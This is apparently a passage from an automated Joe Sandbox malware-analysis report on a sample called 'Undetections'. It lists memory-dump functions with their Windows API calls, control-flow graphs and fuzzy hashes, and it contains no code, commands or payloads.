                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.4313638841.0000000016DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 16DE0000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_16de0000_Undetections.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                            • Opcode ID: 31b1429905b4240a5daaa53675839fb2afeb22554fa824c8b0ac44237de5692a
                                                                                                                                                                                                            • Instruction ID: 38a1236be7e8c477fe81f8e38b2c7a02fed191ac406df718784bf5a606cad6c0
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 31b1429905b4240a5daaa53675839fb2afeb22554fa824c8b0ac44237de5692a
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5C41DD79E012188FCF04DFE5D984AEDFBB2BF8A311F14902AE406BB2A4DB345905CB54
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Function 00C2FD18 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 128threadCOMMON
                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                            control_flow_graph 2693 c2fd18-c2fda7 GetCurrentProcess 2697 c2fdb0-c2fde4 GetCurrentThread 2693->2697 2698 c2fda9-c2fdaf 2693->2698 2699 c2fde6-c2fdec 2697->2699 2700 c2fded-c2fe21 GetCurrentProcess 2697->2700 2698->2697 2699->2700 2701 c2fe23-c2fe29 2700->2701 2702 c2fe2a-c2fe42 2700->2702 2701->2702 2706 c2fe4b-c2fe7a GetCurrentThreadId 2702->2706 2707 c2fe83-c2fee5 2706->2707 2708 c2fe7c-c2fe82 2706->2708 2708->2707
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • GetCurrentProcess.KERNEL32 ref: 00C2FD96
                                                                                                                                                                                                            • GetCurrentThread.KERNEL32 ref: 00C2FDD3
                                                                                                                                                                                                            • GetCurrentProcess.KERNEL32 ref: 00C2FE10
                                                                                                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 00C2FE69
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.4082198044.0000000000C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C20000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_c20000_Undetections.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Current$ProcessThread
                                                                                                                                                                                                            • String ID: P
                                                                                                                                                                                                            • API String ID: 2063062207-1343716551
                                                                                                                                                                                                            • Opcode ID: c909feca36741ef5eb18d6a2c64458440a60411436d1eaf0f458370b650d4244
                                                                                                                                                                                                            • Instruction ID: 8a66143d8fb4cdf74fc68db1ebbc2e7fd269e619b58b2821b066256ffee94dc4
                                                                                                                                                                                                            • Opcode Fuzzy Hash: c909feca36741ef5eb18d6a2c64458440a60411436d1eaf0f458370b650d4244
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0F5136B0900249CFDB14DFAAD948B9EBBF1EF88314F20C469E419A7361D774A944CF65
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Function 04EA5F38 Relevance: 5.0, APIs: 3, Instructions: 508COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.4104612227.0000000004EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EA0000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_4ea0000_Undetections.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                            • Opcode ID: 89abc3ecfeec33e8efa0fb376c6299875b87e5216eb36d4d78709b3e9e1e700b
                                                                                                                                                                                                            • Instruction ID: 4d5ae1bd0b3b42d76f19f501de79d8eb43c38be344029951368b9dad6f999060
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 89abc3ecfeec33e8efa0fb376c6299875b87e5216eb36d4d78709b3e9e1e700b
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 76224D74E04205CBDB14DF68C584AAEB7B2EF86318F28D056D9916F354DB34BCA1CB51
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Function 05FC26C8 Relevance: 4.0, Strings: 3, Instructions: 285COMMON
                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                            control_flow_graph 3289 5fc26c8-5fc6172 3292 5fc617b-5fc618b 3289->3292 3293 5fc6174-5fc624f 3289->3293 3295 5fc6256-5fc6328 3292->3295 3296 5fc6191-5fc61a1 3292->3296 3293->3295 3315 5fc632f-5fc637a call 5fc5a84 call 5fc5ac0 3295->3315 3296->3295 3297 5fc61a7-5fc61ab 3296->3297 3298 5fc61ad 3297->3298 3299 5fc61b3-5fc61d2 3297->3299 3298->3295 3298->3299 3302 5fc61f9-5fc61fe 3299->3302 3303 5fc61d4-5fc61f4 call 5fc5a84 call 5fc5a94 call 5fc26b8 3299->3303 3305 5fc6207-5fc621a call 5fc5ab4 3302->3305 3306 5fc6200-5fc6202 call 5fc5aa4 3302->3306 3303->3302 3305->3315 3316 5fc6220-5fc6227 3305->3316 3306->3305 3331 5fc637c-5fc637e 3315->3331 3332 5fc6388-5fc6405 call 5fc5acc 3315->3332 3334 5fc640c-5fc64af 3331->3334 3335 5fc6384-5fc6387 3331->3335 3332->3334 3346 5fc64b5-5fc64c0 3334->3346 3349 5fc64c9-5fc64e6 3346->3349 3350 5fc64c2-5fc64c8 3346->3350 3350->3349
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.4108374729.0000000005FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FB0000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_5fb0000_Undetections.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID: (oq$Hoq$Hoq
                                                                                                                                                                                                            • API String ID: 0-3931962165
                                                                                                                                                                                                            • Opcode ID: 173e633765e6a0790ba711019ccbe86835b22bace95a1c69b1a910d7df692390
                                                                                                                                                                                                            • Instruction ID: 491fc96bda06743b52c411e853f1bab5b50b748d2c5ad0548b32576b8072b4e1
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 173e633765e6a0790ba711019ccbe86835b22bace95a1c69b1a910d7df692390
                                                                                                                                                                                                            • Instruction Fuzzy Hash: B0A1C171B042059FCB14DFA9C9456AFBFF6EB88310F1484ADE406E7395CA389D45CBA1
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Function 05FCD280 Relevance: 2.7, Strings: 2, Instructions: 216COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.4108374729.0000000005FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FB0000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_5fb0000_Undetections.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID: Hoq$Hoq
                                                                                                                                                                                                            • API String ID: 0-3106737575
                                                                                                                                                                                                            • Opcode ID: 69d3170358e205d5911a3aa1f1cb5800254098128c505e28f3ffad9d4f76fc42
                                                                                                                                                                                                            • Instruction ID: ee3deef0586b933a459d0587565e6840417118bd585d121a5623c82bd2e6c6f4
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 69d3170358e205d5911a3aa1f1cb5800254098128c505e28f3ffad9d4f76fc42
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1B816A70E003598FCB14DFA9C994AAEBFF6BF88300F14856AE409AB355DB749905CB91
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Function 05FC26D8 Relevance: 2.7, Strings: 2, Instructions: 151COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.4108374729.0000000005FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FB0000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_5fb0000_Undetections.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID: Hoq$Hoq
                                                                                                                                                                                                            • API String ID: 0-3106737575
                                                                                                                                                                                                            • Opcode ID: 3376ea66c2d1b48a4f19e7d04748a39a903b9e29ff4d809f710b05f12c9c2794
                                                                                                                                                                                                            • Instruction ID: eef7968694f3d29d73281d40f609aea16b1d646651cfb803bee2c81542be5fed
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3376ea66c2d1b48a4f19e7d04748a39a903b9e29ff4d809f710b05f12c9c2794
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 98518B70E042089FCB14DFAA85556AEBFF6EF84310F1484AED446E7391DB389905CBA1
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Function 05FC2890 Relevance: 2.6, Strings: 2, Instructions: 125COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.4108374729.0000000005FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FB0000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_5fb0000_Undetections.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID: N$n
                                                                                                                                                                                                            • API String ID: 0-3735540769
                                                                                                                                                                                                            • Opcode ID: 3704ca0cbff833fbd260fb499bea7237c944d9f76cd66ecce8323a2db5f963b8
                                                                                                                                                                                                            • Instruction ID: 00713c60cd37db9f3b4dcdbe21785bed90cf367dccdc94300a639c9db264d4e1
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3704ca0cbff833fbd260fb499bea7237c944d9f76cd66ecce8323a2db5f963b8
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7751AF79E04218CFDF04DFAAD9846DDBFB6FB88311F10912AE859AB354EB385845DB10
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Function 05FC6150 Relevance: 2.6, Strings: 2, Instructions: 118COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.4108374729.0000000005FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FB0000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_5fb0000_Undetections.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID: (oq$Hoq
                                                                                                                                                                                                            • API String ID: 0-3084834809
                                                                                                                                                                                                            • Opcode ID: 0aabe4413fa0903215c6c4d5a298930eb59a8bb7335febe214b446fadf1c9374
                                                                                                                                                                                                            • Instruction ID: 1cfd9c94806ec03234d392d66bb947f92a5ce9958f0707cf247afe9a56840eb8
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0aabe4413fa0903215c6c4d5a298930eb59a8bb7335febe214b446fadf1c9374
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9B312170B001058FEB186BA8891973F3EEBFBC4340B2589B99106A7394DE389C068790
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Function 05FC8DB0 Relevance: 2.6, Strings: 2, Instructions: 85COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.4108374729.0000000005FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FB0000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_5fb0000_Undetections.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID: $kq$$kq
                                                                                                                                                                                                            • API String ID: 0-3550614674
                                                                                                                                                                                                            • Opcode ID: 9de459652e8fd363e268f3140c0e910135b92f5ca224e204e2487526b223c068
                                                                                                                                                                                                            • Instruction ID: 1eed349eddd0996944f8b545574036fe6dbd8918b21e144f04e05f163381aed8
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9de459652e8fd363e268f3140c0e910135b92f5ca224e204e2487526b223c068
                                                                                                                                                                                                            • Instruction Fuzzy Hash: B721803165060A8FDB25DB39DA44A2677FBFF88314B20097ED18AC7664EA39F841C704
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Function 04EA45A4 Relevance: 1.6, APIs: 1, Instructions: 120COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 04EA46C2
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.4104612227.0000000004EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EA0000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_4ea0000_Undetections.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: CreateWindow
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 716092398-0
                                                                                                                                                                                                            • Opcode ID: 4e93ed47309241f685f3023902c3ba107d8218f7947f8eb65a6aeb3bf92e7d2a
                                                                                                                                                                                                            • Instruction ID: 79ec74f70023bc6cc3c5b0898b0087c7400de9256cc523525273de4a4d272e61
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4e93ed47309241f685f3023902c3ba107d8218f7947f8eb65a6aeb3bf92e7d2a
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2951E1B1D002499FDB14CF99C884ADEBBB5BF88304F24912AE418AB254D7B5A885CF90
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Function 04EA45B0 Relevance: 1.6, APIs: 1, Instructions: 113COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 04EA46C2
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.4104612227.0000000004EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EA0000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_4ea0000_Undetections.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: CreateWindow
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 716092398-0
                                                                                                                                                                                                            • Opcode ID: 9d315ac224c90aa8fdbaa6656905eebdf5cf8d0de950b5059ac8e99fe161bdd5
                                                                                                                                                                                                            • Instruction ID: 7b71ef46132c583afdfb042fbf8e2c67fef07782443d4576b63782240af1efd8
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9d315ac224c90aa8fdbaa6656905eebdf5cf8d0de950b5059ac8e99fe161bdd5
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1C41E3B1D003499FDB14CF9AC984ADEBFF5BF88314F24852AE419AB254D775A881CF90
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Function 00C27A05 Relevance: 1.6, APIs: 1, Instructions: 100COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • CreateActCtxA.KERNEL32(?), ref: 00C27AC1
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.4082198044.0000000000C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C20000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_c20000_Undetections.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Create
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 2289755597-0
                                                                                                                                                                                                            • Opcode ID: e07ae9a16fe0e5848e7a7679959508b949ea594c051fef5eabcda4ec7c0bc405
                                                                                                                                                                                                            • Instruction ID: 20fd211308e547dc961427f2e172bd446a564b608dd0bfdbccb209d95ddd7da2
                                                                                                                                                                                                            • Opcode Fuzzy Hash: e07ae9a16fe0e5848e7a7679959508b949ea594c051fef5eabcda4ec7c0bc405
                                                                                                                                                                                                            • Instruction Fuzzy Hash: DD41F4B0C0421DCFDB24CFA9C984BDEBBB5BF49304F24815AD408AB655DB756A45CF90
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Function 04EA26CC Relevance: 1.6, APIs: 1, Instructions: 97COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • CallWindowProcW.USER32(?,?,?,?,?), ref: 04EA6C31
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.4104612227.0000000004EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EA0000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_4ea0000_Undetections.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: CallProcWindow
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 2714655100-0
                                                                                                                                                                                                            • Opcode ID: 33458418526989392d92ee07d034f55d74afd62b34adf043e46e0c9860c1ed9a
                                                                                                                                                                                                            • Instruction ID: bb9661ced224f11afad4756f2836b684f3c3ae85b5365d7eb5b8eff95a2b5146
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 33458418526989392d92ee07d034f55d74afd62b34adf043e46e0c9860c1ed9a
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 374128B4A002058FDB14CF99C888AAABBF5FF89314F24C499D559AB321D735F841CFA1
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Function 00C263F0 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • CreateActCtxA.KERNEL32(?), ref: 00C27AC1
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.4082198044.0000000000C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C20000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_c20000_Undetections.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Create
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 2289755597-0
                                                                                                                                                                                                            • Opcode ID: 24d3ec50e47abee7ef5dc327f7e68fe3d196e36ca26eac6a46e3ce6ae72ec151
                                                                                                                                                                                                            • Instruction ID: 99fd9bdae02487eca511b39028d14c5ea36f625f85a529006b900f4bd168dad4
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 24d3ec50e47abee7ef5dc327f7e68fe3d196e36ca26eac6a46e3ce6ae72ec151
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0D41E3B0C0461DCFDB24CFA9C984B8DBBF5BF45304F24816AD408AB655DB756945CF90
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Function 0794BE48 Relevance: 1.6, APIs: 1, Instructions: 82COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • SetWindowTextW.USER32(?,00000000), ref: 0794BEBA
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.4111219890.0000000007940000.00000040.00000800.00020000.00000000.sdmp, Offset: 07940000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7940000_Undetections.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: TextWindow
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 530164218-0
                                                                                                                                                                                                            • Opcode ID: 6fddb522070c3a3cc19f0f889bd43b69ead63b872aee5eb2880539c7f3de5e02
                                                                                                                                                                                                            • Instruction ID: 53c9a6e1a0cd05ef9472d34b091db008cfb82c2051d825499649ead0a783c7c5
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6fddb522070c3a3cc19f0f889bd43b69ead63b872aee5eb2880539c7f3de5e02
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8F3158B5A00619CFCB14CFAAD440BEFBBF9FF88714F10842AD419A7610D738A945CBA5
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Function 0794EE5F Relevance: 1.6, APIs: 1, Instructions: 80COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • GetClassInfoW.USER32(?,00000000), ref: 0794EF14
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.4111219890.0000000007940000.00000040.00000800.00020000.00000000.sdmp, Offset: 07940000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7940000_Undetections.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: ClassInfo
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 3534257612-0
                                                                                                                                                                                                            • Opcode ID: aa44de7211c93d744656e2e5534d95c4c9145f4b3996822929b30cacd6d65576
                                                                                                                                                                                                            • Instruction ID: c651d9af94ba0ff9f12c6c2b0a1594e372a6110c442a4b0615d9f4ba8967b8cb
                                                                                                                                                                                                            • Opcode Fuzzy Hash: aa44de7211c93d744656e2e5534d95c4c9145f4b3996822929b30cacd6d65576
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8331A2B5D053959FDB05CFA9C944ADEBFF4FF09214F14849ED488A7252D338A809CB61
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Function 07037CD0 Relevance: 1.6, APIs: 1, Instructions: 73COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • DrawTextExW.USER32(?,?,?,?,?,?), ref: 07037D6F
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.4108773320.0000000007030000.00000040.00000800.00020000.00000000.sdmp, Offset: 07030000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7030000_Undetections.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: DrawText
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 2175133113-0
                                                                                                                                                                                                            • Opcode ID: 0ba6d7e6d56b0e2b0cc7ab4ff8e99f0a8df1a04f8b483ad70916bc0536abe157
                                                                                                                                                                                                            • Instruction ID: ca740849571cf9c22f3948ddfbda519130d13cae1ea8aa84cc96bdc779d634b2
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0ba6d7e6d56b0e2b0cc7ab4ff8e99f0a8df1a04f8b483ad70916bc0536abe157
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0431F2B5D002499FDB10CF9AD884AEEFBF5FB48320F14842AE819A7610D375A940CFA5
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Function 07037CD8 Relevance: 1.6, APIs: 1, Instructions: 69COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • DrawTextExW.USER32(?,?,?,?,?,?), ref: 07037D6F
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.4108773320.0000000007030000.00000040.00000800.00020000.00000000.sdmp, Offset: 07030000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7030000_Undetections.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: DrawText
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 2175133113-0
                                                                                                                                                                                                            • Opcode ID: 67227d5959e5cc597d187b4cd4a26bae5fff28f4684b05e67ee5249e15380306
                                                                                                                                                                                                            • Instruction ID: f37b2a6c994fd2bf6fbeeb8fbe762519771c2e92508d91f21277057959a9439e
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 67227d5959e5cc597d187b4cd4a26bae5fff28f4684b05e67ee5249e15380306
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4621D4B5D002499FDB10CF9AD884AEEFBF9FB48310F14842AE819A7210D775A944CFA4
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Function 0794EE98 Relevance: 1.6, APIs: 1, Instructions: 61COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • GetClassInfoW.USER32(?,00000000), ref: 0794EF14
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.4111219890.0000000007940000.00000040.00000800.00020000.00000000.sdmp, Offset: 07940000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7940000_Undetections.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: ClassInfo
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 3534257612-0
                                                                                                                                                                                                            • Opcode ID: c7f9f9fa7d2c647956068573d1e3b3b05c4a916cfcb49c8e8fe434f348e73884
                                                                                                                                                                                                            • Instruction ID: b3a9e97f4d143664666b4442b17df7140b9adb410a75a84906805c7f0789107d
                                                                                                                                                                                                            • Opcode Fuzzy Hash: c7f9f9fa7d2c647956068573d1e3b3b05c4a916cfcb49c8e8fe434f348e73884
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5F2115B1D0171A9FDB10CF9AC884ADEFBF8FB48314F54842AE458A3240D379A944CF65
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Function 0F0FD520 Relevance: 1.6, APIs: 1, Instructions: 56windowCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.4308818025.000000000F0F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0F0F0000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_f0f0000_Undetections.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: DispatchMessage
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 2061451462-0
                                                                                                                                                                                                            • Opcode ID: eb3dca1282fd11cbbbf194d9764015a7e1699eea8b5f43d153edd0d2efd55e8f
                                                                                                                                                                                                            • Instruction ID: f366212a5f5e7b27742abc72d4234502625789b579a22e54343b4a2f53e6d424
